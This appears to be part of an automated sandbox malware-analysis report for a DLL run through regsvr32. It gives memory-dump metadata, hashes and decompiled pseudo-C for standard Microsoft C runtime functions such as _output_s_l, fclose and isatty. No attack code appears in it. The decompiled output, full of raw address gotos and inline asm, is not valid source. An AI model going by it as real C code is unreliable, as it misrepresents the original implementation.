                                                                                                                                            • Associated: 00000010.00000002.323808802.00007FFC65D1F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_16_2_7ffc65cf0000_regsvr32.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Frame$CreateDestroyedExceptionFindInfoObjectUnlink
                                                                                                                                            • String ID: csm
                                                                                                                                            • API String ID: 2005287440-1018135373
                                                                                                                                            • Opcode ID: 4c556ceed80f2aba1954f9041ed191ad0fbab56fa1f8ad9f2457e70616e7d401
                                                                                                                                            • Instruction ID: d6824526baaef887d37314e51ce39feab134f4620d6850e506fadecab7e44991
                                                                                                                                            • Opcode Fuzzy Hash: 4c556ceed80f2aba1954f9041ed191ad0fbab56fa1f8ad9f2457e70616e7d401
                                                                                                                                            • Instruction Fuzzy Hash: 3651D63650CB9AC2DA609F19F0903AE77A0FBC8B91F614535EA8D47BA9DF39D440CB50
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            C-Code - Quality: 20%
                                                                                                                                            			E00007FFC7FFC65D0C719(signed int __rax, void* __rdx, long long _a32, void* _a64, void* _a72, intOrPtr _a76, signed int _a80, char _a84, char _a85, intOrPtr _a88, long long _a92, long long _a96, signed char _a104, intOrPtr _a108, signed int _a116, char _a120, char _a687, char _a688, intOrPtr _a704, intOrPtr _a708, signed char _a816, signed int _a824, signed int _a832, intOrPtr _a840, signed short* _a848, signed char _a856, char _a860, char _a864, long long _a872, intOrPtr _a876, intOrPtr _a912, intOrPtr _a916, signed int _a1040, long long _a1048, signed short _a1056, long long _a1060, signed int _a1064, intOrPtr _a1088, char _a1112) {
                                                                                                                                            				signed int _t212;
                                                                                                                                            				signed char _t217;
                                                                                                                                            				intOrPtr _t252;
                                                                                                                                            				signed int _t327;
                                                                                                                                            				signed int _t328;
                                                                                                                                            				signed long long _t331;
                                                                                                                                            				intOrPtr* _t354;
                                                                                                                                            				signed long long _t379;
                                                                                                                                            
                                                                                                                                            				_t327 = __rax;
                                                                                                                                            				_a708 = 0x27;
                                                                                                                                            				_a72 = 0x10;
                                                                                                                                            				if ((_a80 & 0x00000080) == 0) goto 0x65d0c754;
                                                                                                                                            				_a84 = 0x30;
                                                                                                                                            				_a85 = _a708 + 0x51;
                                                                                                                                            				_a92 = 2;
                                                                                                                                            				_a72 = 8;
                                                                                                                                            				if ((_a80 & 0x00000080) == 0) goto 0x65d0c777;
                                                                                                                                            				asm("bts eax, 0x9");
                                                                                                                                            				if ((_a80 & 0x00008000) == 0) goto 0x65d0c79e;
                                                                                                                                            				E00007FFC7FFC65D01EA0( &_a1112);
                                                                                                                                            				_a824 = _t327;
                                                                                                                                            				goto 0x65d0c84b;
                                                                                                                                            				if ((_a80 & 0x00001000) == 0) goto 0x65d0c7c5;
                                                                                                                                            				E00007FFC7FFC65D01EA0( &_a1112);
                                                                                                                                            				_a824 = _t327;
                                                                                                                                            				goto 0x65d0c84b;
                                                                                                                                            				if ((_a80 & 0x00000020) == 0) goto 0x65d0c810;
                                                                                                                                            				if ((_a80 & 0x00000040) == 0) goto 0x65d0c7f6;
                                                                                                                                            				_t328 = E00007FFC7FFC65D01E40( &_a1112);
                                                                                                                                            				_a824 = _t328;
                                                                                                                                            				goto 0x65d0c80e;
                                                                                                                                            				E00007FFC7FFC65D01E40( &_a1112);
                                                                                                                                            				_a824 = _t328;
                                                                                                                                            				goto 0x65d0c84b;
                                                                                                                                            				if ((_a80 & 0x00000040) == 0) goto 0x65d0c834;
                                                                                                                                            				E00007FFC7FFC65D01E40( &_a1112);
                                                                                                                                            				_a824 = _t328;
                                                                                                                                            				goto 0x65d0c84b;
                                                                                                                                            				E00007FFC7FFC65D01E40( &_a1112);
                                                                                                                                            				_a824 = _t328;
                                                                                                                                            				if ((_a80 & 0x00000040) == 0) goto 0x65d0c882;
                                                                                                                                            				if (_a824 >= 0) goto 0x65d0c882;
                                                                                                                                            				_a832 =  ~_a824;
                                                                                                                                            				asm("bts eax, 0x8");
                                                                                                                                            				goto 0x65d0c892;
                                                                                                                                            				_t331 = _a824;
                                                                                                                                            				_a832 = _t331;
                                                                                                                                            				if ((_a80 & 0x00008000) != 0) goto 0x65d0c8c7;
                                                                                                                                            				if ((_a80 & 0x00001000) != 0) goto 0x65d0c8c7;
                                                                                                                                            				_a832 = _a832 & _t331;
                                                                                                                                            				if (_a116 >= 0) goto 0x65d0c8d8;
                                                                                                                                            				_a116 = 1;
                                                                                                                                            				goto 0x65d0c8f5;
                                                                                                                                            				_a80 = _a80 & 0xfffffff7;
                                                                                                                                            				if (_a116 - 0x200 <= 0) goto 0x65d0c8f5;
                                                                                                                                            				_a116 = 0x200;
                                                                                                                                            				if (_a832 != 0) goto 0x65d0c908;
                                                                                                                                            				_a92 = 0;
                                                                                                                                            				_a64 =  &_a687;
                                                                                                                                            				_t212 = _a116;
                                                                                                                                            				_a116 = _a116 - 1;
                                                                                                                                            				if (_t212 > 0) goto 0x65d0c936;
                                                                                                                                            				if (_a832 == 0) goto 0x65d0c9d3;
                                                                                                                                            				_a1040 = _a72;
                                                                                                                                            				_a816 = _t212 / _a1040 + 0x30;
                                                                                                                                            				_a1048 = _a72;
                                                                                                                                            				if (_a816 - 0x39 <= 0) goto 0x65d0c9b2;
                                                                                                                                            				_t217 = _a816 + _a708;
                                                                                                                                            				_a816 = _t217;
                                                                                                                                            				 *_a64 = _a816 & 0x000000ff;
                                                                                                                                            				_a64 = _a64 - 1;
                                                                                                                                            				goto 0x65d0c915;
                                                                                                                                            				_a104 = _t217;
                                                                                                                                            				_a64 = _a64 + 1;
                                                                                                                                            				if ((_a80 & 0x00000200) == 0) goto 0x65d0ca31;
                                                                                                                                            				if (_a104 == 0) goto 0x65d0ca12;
                                                                                                                                            				if ( *_a64 == 0x30) goto 0x65d0ca31;
                                                                                                                                            				_a64 = _a64 - 1;
                                                                                                                                            				 *_a64 = 0x30;
                                                                                                                                            				_a104 = _a104 + 1;
                                                                                                                                            				if (_a108 != 0) goto 0x65d0cc6e;
                                                                                                                                            				if ((_a80 & 0x00000040) == 0) goto 0x65d0ca95;
                                                                                                                                            				if ((_a80 & 0x00000100) == 0) goto 0x65d0ca63;
                                                                                                                                            				_a84 = 0x2d;
                                                                                                                                            				_a92 = 1;
                                                                                                                                            				goto 0x65d0ca95;
                                                                                                                                            				if ((_a80 & 0x00000001) == 0) goto 0x65d0ca7d;
                                                                                                                                            				_a84 = 0x2b;
                                                                                                                                            				_a92 = 1;
                                                                                                                                            				goto 0x65d0ca95;
                                                                                                                                            				if ((_a80 & 0x00000002) == 0) goto 0x65d0ca95;
                                                                                                                                            				_a84 = 0x20;
                                                                                                                                            				_a92 = 1;
                                                                                                                                            				_a840 = _a88 - _a104 - _a92;
                                                                                                                                            				if ((_a80 & 0x0000000c) != 0) goto 0x65d0cad5;
                                                                                                                                            				E00007FFC7FFC65D0CF10(0x20, _a840, _a1088,  &_a688);
                                                                                                                                            				E00007FFC7FFC65D0CF60(_a92, _a64,  &_a84, _a1088,  &_a688);
                                                                                                                                            				if ((_a80 & 0x00000008) == 0) goto 0x65d0cb27;
                                                                                                                                            				if ((_a80 & 0x00000004) != 0) goto 0x65d0cb27;
                                                                                                                                            				E00007FFC7FFC65D0CF10(0x30, _a840, _a1088,  &_a688);
                                                                                                                                            				if (_a76 == 0) goto 0x65d0cc1d;
                                                                                                                                            				if (_a104 <= 0) goto 0x65d0cc1d;
                                                                                                                                            				_a872 = 0;
                                                                                                                                            				_a848 = _a64;
                                                                                                                                            				_a856 = _a104;
                                                                                                                                            				_a856 = _a856 - 1;
                                                                                                                                            				if (_a856 == 0) goto 0x65d0cc1b;
                                                                                                                                            				_a1056 =  *_a848 & 0x0000ffff;
                                                                                                                                            				r9d = _a1056 & 0x0000ffff;
                                                                                                                                            				r8d = 6;
                                                                                                                                            				_a872 = E00007FFC7FFC65D0B530( &_a860,  &_a864, _a1088);
                                                                                                                                            				_a848 =  &(_a848[1]);
                                                                                                                                            				if (_a872 != 0) goto 0x65d0cbe5;
                                                                                                                                            				if (_a860 != 0) goto 0x65d0cbf2;
                                                                                                                                            				_a688 = 0xffffffff;
                                                                                                                                            				goto 0x65d0cc1b;
                                                                                                                                            				E00007FFC7FFC65D0CF60(_a860,  &(_a848[1]),  &_a864, _a1088,  &_a688);
                                                                                                                                            				goto 0x65d0cb60;
                                                                                                                                            				goto 0x65d0cc3b;
                                                                                                                                            				E00007FFC7FFC65D0CF60(_a104,  &(_a848[1]), _a64, _a1088,  &_a688);
                                                                                                                                            				if (_a688 < 0) goto 0x65d0cc6e;
                                                                                                                                            				if ((_a80 & 0x00000004) == 0) goto 0x65d0cc6e;
                                                                                                                                            				E00007FFC7FFC65D0CF10(0x20, _a840, _a1088,  &_a688);
                                                                                                                                            				if (_a96 == 0) goto 0x65d0cc8e;
                                                                                                                                            				0x65cf5330();
                                                                                                                                            				_a96 = 0;
                                                                                                                                            				goto 0x65d0b99c;
                                                                                                                                            				if (_a704 == 0) goto 0x65d0ccb4;
                                                                                                                                            				if (_a704 == 7) goto 0x65d0ccb4;
                                                                                                                                            				_a1060 = 0;
                                                                                                                                            				goto 0x65d0ccbf;
                                                                                                                                            				_a1060 = 1;
                                                                                                                                            				_t252 = _a1060;
                                                                                                                                            				_a876 = _t252;
                                                                                                                                            				if (_a876 != 0) goto 0x65d0cd05;
                                                                                                                                            				_t354 = L"((state == ST_NORMAL) || (state == ST_TYPE))";
                                                                                                                                            				_a32 = _t354;
                                                                                                                                            				r9d = 0;
                                                                                                                                            				r8d = 0x8f5;
                                                                                                                                            				0x65cfb3b0();
                                                                                                                                            				if (_t252 != 1) goto 0x65d0cd05;
                                                                                                                                            				asm("int3");
                                                                                                                                            				if (_a876 != 0) goto 0x65d0cd61;
                                                                                                                                            				0x65cfab30();
                                                                                                                                            				 *_t354 = 0x16;
                                                                                                                                            				_a32 = 0;
                                                                                                                                            				r9d = 0x8f5;
                                                                                                                                            				E00007FFC7FFC65CFBD70(L"((state == ST_NORMAL) || (state == ST_TYPE))", L"_output_s_l", L"f:\\dd\\vctools\\crt_bld\\self_64_amd64\\crt\\src\\output.c");
                                                                                                                                            				_a912 = 0xffffffff;
                                                                                                                                            				E00007FFC7FFC65CF6800( &_a120);
                                                                                                                                            				goto 0x65d0cd80;
                                                                                                                                            				_a916 = _a688;
                                                                                                                                            				E00007FFC7FFC65CF6800( &_a120);
                                                                                                                                            				return E00007FFC7FFC65CF3280(_a916, 2, 2, _a1064 ^ _t379, L"_output_s_l", L"f:\\dd\\vctools\\crt_bld\\self_64_amd64\\crt\\src\\output.c");
                                                                                                                                            			}











                                                                                                                                            0x7ffc65d0c719
                                                                                                                                            0x7ffc65d0c719
                                                                                                                                            0x7ffc65d0c724
                                                                                                                                            0x7ffc65d0c737
                                                                                                                                            0x7ffc65d0c739
                                                                                                                                            0x7ffc65d0c748
                                                                                                                                            0x7ffc65d0c74c
                                                                                                                                            0x7ffc65d0c756
                                                                                                                                            0x7ffc65d0c769
                                                                                                                                            0x7ffc65d0c76f
                                                                                                                                            0x7ffc65d0c782
                                                                                                                                            0x7ffc65d0c78c
                                                                                                                                            0x7ffc65d0c791
                                                                                                                                            0x7ffc65d0c799
                                                                                                                                            0x7ffc65d0c7a9
                                                                                                                                            0x7ffc65d0c7b3
                                                                                                                                            0x7ffc65d0c7b8
                                                                                                                                            0x7ffc65d0c7c0
                                                                                                                                            0x7ffc65d0c7ce
                                                                                                                                            0x7ffc65d0c7d9
                                                                                                                                            0x7ffc65d0c7e8
                                                                                                                                            0x7ffc65d0c7ec
                                                                                                                                            0x7ffc65d0c7f4
                                                                                                                                            0x7ffc65d0c7fe
                                                                                                                                            0x7ffc65d0c806
                                                                                                                                            0x7ffc65d0c80e
                                                                                                                                            0x7ffc65d0c819
                                                                                                                                            0x7ffc65d0c823
                                                                                                                                            0x7ffc65d0c82a
                                                                                                                                            0x7ffc65d0c832
                                                                                                                                            0x7ffc65d0c83c
                                                                                                                                            0x7ffc65d0c843
                                                                                                                                            0x7ffc65d0c854
                                                                                                                                            0x7ffc65d0c85f
                                                                                                                                            0x7ffc65d0c86c
                                                                                                                                            0x7ffc65d0c878
                                                                                                                                            0x7ffc65d0c880
                                                                                                                                            0x7ffc65d0c882
                                                                                                                                            0x7ffc65d0c88a
                                                                                                                                            0x7ffc65d0c89d
                                                                                                                                            0x7ffc65d0c8aa
                                                                                                                                            0x7ffc65d0c8bf
                                                                                                                                            0x7ffc65d0c8cc
                                                                                                                                            0x7ffc65d0c8ce
                                                                                                                                            0x7ffc65d0c8d6
                                                                                                                                            0x7ffc65d0c8df
                                                                                                                                            0x7ffc65d0c8eb
                                                                                                                                            0x7ffc65d0c8ed
                                                                                                                                            0x7ffc65d0c8fe
                                                                                                                                            0x7ffc65d0c900
                                                                                                                                            0x7ffc65d0c910
                                                                                                                                            0x7ffc65d0c915
                                                                                                                                            0x7ffc65d0c91f
                                                                                                                                            0x7ffc65d0c925
                                                                                                                                            0x7ffc65d0c930
                                                                                                                                            0x7ffc65d0c93b
                                                                                                                                            0x7ffc65d0c95e
                                                                                                                                            0x7ffc65d0c96a
                                                                                                                                            0x7ffc65d0c997
                                                                                                                                            0x7ffc65d0c9a9
                                                                                                                                            0x7ffc65d0c9ab
                                                                                                                                            0x7ffc65d0c9bf
                                                                                                                                            0x7ffc65d0c9c9
                                                                                                                                            0x7ffc65d0c9ce
                                                                                                                                            0x7ffc65d0c9e0
                                                                                                                                            0x7ffc65d0c9ec
                                                                                                                                            0x7ffc65d0c9fc
                                                                                                                                            0x7ffc65d0ca03
                                                                                                                                            0x7ffc65d0ca10
                                                                                                                                            0x7ffc65d0ca1a
                                                                                                                                            0x7ffc65d0ca24
                                                                                                                                            0x7ffc65d0ca2d
                                                                                                                                            0x7ffc65d0ca36
                                                                                                                                            0x7ffc65d0ca45
                                                                                                                                            0x7ffc65d0ca52
                                                                                                                                            0x7ffc65d0ca54
                                                                                                                                            0x7ffc65d0ca59
                                                                                                                                            0x7ffc65d0ca61
                                                                                                                                            0x7ffc65d0ca6c
                                                                                                                                            0x7ffc65d0ca6e
                                                                                                                                            0x7ffc65d0ca73
                                                                                                                                            0x7ffc65d0ca7b
                                                                                                                                            0x7ffc65d0ca86
                                                                                                                                            0x7ffc65d0ca88
                                                                                                                                            0x7ffc65d0ca8d
                                                                                                                                            0x7ffc65d0caa5
                                                                                                                                            0x7ffc65d0cab5
                                                                                                                                            0x7ffc65d0cad0
                                                                                                                                            0x7ffc65d0caee
                                                                                                                                            0x7ffc65d0cafc
                                                                                                                                            0x7ffc65d0cb07
                                                                                                                                            0x7ffc65d0cb22
                                                                                                                                            0x7ffc65d0cb2c
                                                                                                                                            0x7ffc65d0cb37
                                                                                                                                            0x7ffc65d0cb3d
                                                                                                                                            0x7ffc65d0cb4d
                                                                                                                                            0x7ffc65d0cb59
                                                                                                                                            0x7ffc65d0cb70
                                                                                                                                            0x7ffc65d0cb79
                                                                                                                                            0x7ffc65d0cb8a
                                                                                                                                            0x7ffc65d0cb92
                                                                                                                                            0x7ffc65d0cb9b
                                                                                                                                            0x7ffc65d0cbb6
                                                                                                                                            0x7ffc65d0cbc9
                                                                                                                                            0x7ffc65d0cbd9
                                                                                                                                            0x7ffc65d0cbe3
                                                                                                                                            0x7ffc65d0cbe5
                                                                                                                                            0x7ffc65d0cbf0
                                                                                                                                            0x7ffc65d0cc11
                                                                                                                                            0x7ffc65d0cc16
                                                                                                                                            0x7ffc65d0cc1b
                                                                                                                                            0x7ffc65d0cc36
                                                                                                                                            0x7ffc65d0cc43
                                                                                                                                            0x7ffc65d0cc4e
                                                                                                                                            0x7ffc65d0cc69
                                                                                                                                            0x7ffc65d0cc74
                                                                                                                                            0x7ffc65d0cc80
                                                                                                                                            0x7ffc65d0cc85
                                                                                                                                            0x7ffc65d0cc8e
                                                                                                                                            0x7ffc65d0cc9b
                                                                                                                                            0x7ffc65d0cca5
                                                                                                                                            0x7ffc65d0cca7
                                                                                                                                            0x7ffc65d0ccb2
                                                                                                                                            0x7ffc65d0ccb4
                                                                                                                                            0x7ffc65d0ccbf
                                                                                                                                            0x7ffc65d0ccc6
                                                                                                                                            0x7ffc65d0ccd5
                                                                                                                                            0x7ffc65d0ccd7
                                                                                                                                            0x7ffc65d0ccde
                                                                                                                                            0x7ffc65d0cce3
                                                                                                                                            0x7ffc65d0cce6
                                                                                                                                            0x7ffc65d0ccf8
                                                                                                                                            0x7ffc65d0cd00
                                                                                                                                            0x7ffc65d0cd02
                                                                                                                                            0x7ffc65d0cd0d
                                                                                                                                            0x7ffc65d0cd0f
                                                                                                                                            0x7ffc65d0cd14
                                                                                                                                            0x7ffc65d0cd1a
                                                                                                                                            0x7ffc65d0cd23
                                                                                                                                            0x7ffc65d0cd3e
                                                                                                                                            0x7ffc65d0cd43
                                                                                                                                            0x7ffc65d0cd53
                                                                                                                                            0x7ffc65d0cd5f
                                                                                                                                            0x7ffc65d0cd68
                                                                                                                                            0x7ffc65d0cd74
                                                                                                                                            0x7ffc65d0cd97

                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000010.00000002.323699379.00007FFC65CF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFC65CF0000, based on PE: true
                                                                                                                                            • Associated: 00000010.00000002.323681569.00007FFC65CF0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000010.00000002.323759845.00007FFC65D12000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000010.00000002.323794895.00007FFC65D1B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000010.00000002.323808802.00007FFC65D1F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_16_2_7ffc65cf0000_regsvr32.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: get_int64_arg
                                                                                                                                            • String ID: '$0$9
                                                                                                                                            • API String ID: 1967237116-269856862
                                                                                                                                            • Opcode ID: 83c439eea7fc9ce93bcb821b911d608e7d80de2d13083439c5735137d4fc31ad
                                                                                                                                            • Instruction ID: 6061003de84061e4c2c11af31de278e3025c6d7489b95d01d496fe0dd22bb505
                                                                                                                                            • Opcode Fuzzy Hash: 83c439eea7fc9ce93bcb821b911d608e7d80de2d13083439c5735137d4fc31ad
                                                                                                                                            • Instruction Fuzzy Hash: DB41F33260DAC5CBE7798B19E5813AAF7A4F784B50F200525E78C86B98DBBCD540CF24
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000010.00000002.323699379.00007FFC65CF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFC65CF0000, based on PE: true
                                                                                                                                            • Associated: 00000010.00000002.323681569.00007FFC65CF0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000010.00000002.323759845.00007FFC65D12000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000010.00000002.323794895.00007FFC65D1B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000010.00000002.323808802.00007FFC65D1F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_16_2_7ffc65cf0000_regsvr32.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: _invalid_parameter
                                                                                                                                            • String ID: ("Buffer too small", 0)$_vsnprintf_s_l$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\vsprintf.c
                                                                                                                                            • API String ID: 2123368286-3717698799
                                                                                                                                            • Opcode ID: 65def78894184635a726d36e54dfff1a0241531dd31d36ef72262bf6a1fca492
                                                                                                                                            • Instruction ID: 0d9e8b2705353ad723eb61fe5f1ff18d459e1a9a9c4511125a734aba5748ecad
                                                                                                                                            • Opcode Fuzzy Hash: 65def78894184635a726d36e54dfff1a0241531dd31d36ef72262bf6a1fca492
                                                                                                                                            • Instruction Fuzzy Hash: E2414F3190D7AAC5EA748F24E94437A63A0FB85B68F600B35D6AD427D5CF7CD444CB20
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000010.00000002.323699379.00007FFC65CF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFC65CF0000, based on PE: true
                                                                                                                                            • Associated: 00000010.00000002.323681569.00007FFC65CF0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000010.00000002.323759845.00007FFC65D12000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000010.00000002.323794895.00007FFC65D1B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000010.00000002.323808802.00007FFC65D1F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_16_2_7ffc65cf0000_regsvr32.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CountCriticalFileInitializeSectionSpinType_calloc_dbg_calloc_dbg_impl
                                                                                                                                            • String ID: f:\dd\vctools\crt_bld\self_64_amd64\crt\src\ioinit.c
                                                                                                                                            • API String ID: 2306298712-3864165772
                                                                                                                                            • Opcode ID: 3e38e2773493d70adebd926d66924ee4ad8b7a2b1a2b015d6b03c7a7cffd79aa
                                                                                                                                            • Instruction ID: ca9bd23839c1529dba7f9ea9352f7d32759af4ca46ddc38c1f425cfec1612680
                                                                                                                                            • Opcode Fuzzy Hash: 3e38e2773493d70adebd926d66924ee4ad8b7a2b1a2b015d6b03c7a7cffd79aa
                                                                                                                                            • Instruction Fuzzy Hash: BE316D22A0DADAD5E7708F19E84076A73A1FB89B50F618631CAAC877D4DF3DD505CB20
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000010.00000002.323699379.00007FFC65CF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFC65CF0000, based on PE: true
                                                                                                                                            • Associated: 00000010.00000002.323681569.00007FFC65CF0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000010.00000002.323759845.00007FFC65D12000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000010.00000002.323794895.00007FFC65D1B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000010.00000002.323808802.00007FFC65D1F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_16_2_7ffc65cf0000_regsvr32.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: _invalid_parameter
                                                                                                                                            • String ID: _wcstombs_s_l$bufferSize <= INT_MAX$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\wcstombs.c
                                                                                                                                            • API String ID: 2123368286-2562677240
                                                                                                                                            • Opcode ID: dabd10d16ebe11174fc63b9f89b539a3b240949ad9ffb505f617c08bbd3ff20b
                                                                                                                                            • Instruction ID: 71df4541bc57005e3402e59d9861b3a6ab82d9cf462c3a55711ea746c7aa8648
                                                                                                                                            • Opcode Fuzzy Hash: dabd10d16ebe11174fc63b9f89b539a3b240949ad9ffb505f617c08bbd3ff20b
                                                                                                                                            • Instruction Fuzzy Hash: E931583290CB9AD4E6749F10E5403AAB7A1FB85B90F200A35D69D47BE8DF3CD085CB21
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000010.00000002.323699379.00007FFC65CF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFC65CF0000, based on PE: true
                                                                                                                                            • Associated: 00000010.00000002.323681569.00007FFC65CF0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000010.00000002.323759845.00007FFC65D12000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000010.00000002.323794895.00007FFC65D1B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000010.00000002.323808802.00007FFC65D1F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_16_2_7ffc65cf0000_regsvr32.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: _invalid_parameter$__doserrno
                                                                                                                                            • String ID: (str != NULL)$_fclose_nolock$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\fclose.c
                                                                                                                                            • API String ID: 1181141450-2845860089
                                                                                                                                            • Opcode ID: 7bab6b588e6dd2839569b0ca5fa95970036134ebeeb6453b58b8f029525d0fe5
                                                                                                                                            • Instruction ID: 1bb5b0d1d1610b8a3d6ea577a65587bd86560a0195d0e23874a523b61377880d
                                                                                                                                            • Opcode Fuzzy Hash: 7bab6b588e6dd2839569b0ca5fa95970036134ebeeb6453b58b8f029525d0fe5
                                                                                                                                            • Instruction Fuzzy Hash: DE318D3292CA5AC7E764AB11E58476A77A0FB80B84F201931F68E477E5CF7CD440CB10
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000010.00000002.323699379.00007FFC65CF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFC65CF0000, based on PE: true
                                                                                                                                            • Associated: 00000010.00000002.323681569.00007FFC65CF0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000010.00000002.323759845.00007FFC65D12000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000010.00000002.323794895.00007FFC65D1B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000010.00000002.323808802.00007FFC65D1F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_16_2_7ffc65cf0000_regsvr32.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: _invalid_parameter
                                                                                                                                            • String ID: (fh >= 0 && (unsigned)fh < (unsigned)_nhandle)$_isatty$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\isatty.c
                                                                                                                                            • API String ID: 2123368286-160817255
                                                                                                                                            • Opcode ID: 20bce409a33f2d52ae5b3246709d5cabe66b407105c41d1953a7685d10f1773e
                                                                                                                                            • Instruction ID: d36a3a98e9718d55080dc7f680dcbcd18de25db4a67685bb5b99087808a94117
                                                                                                                                            • Opcode Fuzzy Hash: 20bce409a33f2d52ae5b3246709d5cabe66b407105c41d1953a7685d10f1773e
                                                                                                                                            • Instruction Fuzzy Hash: C821F172A2C66ACAE724DF20E684369B7A1FB80B55F605A35E15E476D4DFBCD400CB20
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000010.00000002.323699379.00007FFC65CF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFC65CF0000, based on PE: true
                                                                                                                                            • Associated: 00000010.00000002.323681569.00007FFC65CF0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000010.00000002.323759845.00007FFC65D12000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000010.00000002.323794895.00007FFC65D1B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000010.00000002.323808802.00007FFC65D1F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_16_2_7ffc65cf0000_regsvr32.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: _invalid_parameter
                                                                                                                                            • String ID: (stream != NULL)$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\fclose.c$fclose
                                                                                                                                            • API String ID: 2123368286-3409824857
                                                                                                                                            • Opcode ID: b4902cc461c388e31b4dcd0307079e4da2555ab755984697fa072277fbec1f80
                                                                                                                                            • Instruction ID: 4d5b5e754cf1d09b538f1f96890a50230c5f7677804c9f1c519f8ecbdcca89c8
                                                                                                                                            • Opcode Fuzzy Hash: b4902cc461c388e31b4dcd0307079e4da2555ab755984697fa072277fbec1f80
                                                                                                                                            • Instruction Fuzzy Hash: 7A213972A1C66AC7E764EF10E58476AB760FB80B94F201931E68E47AD5CFBCD854CB10
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000010.00000002.323699379.00007FFC65CF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFC65CF0000, based on PE: true
